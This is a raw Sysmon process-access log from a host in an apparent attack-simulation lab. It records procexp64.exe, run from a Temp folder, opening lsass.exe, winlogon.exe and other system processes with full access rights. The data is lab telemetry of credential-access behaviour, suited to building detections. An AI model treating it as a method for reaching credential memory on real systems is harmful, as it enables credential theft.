emp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791033Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791032Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791031Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791030Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791029Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791028Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791027Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791026Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791025Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791024Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791023Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791022Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791021Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791020Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791019Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791018Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791017Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791016Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791015Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791014Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791013Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791012Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791011Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791010Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791009Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791008Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791007Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791006Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791005Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791004Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791003Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 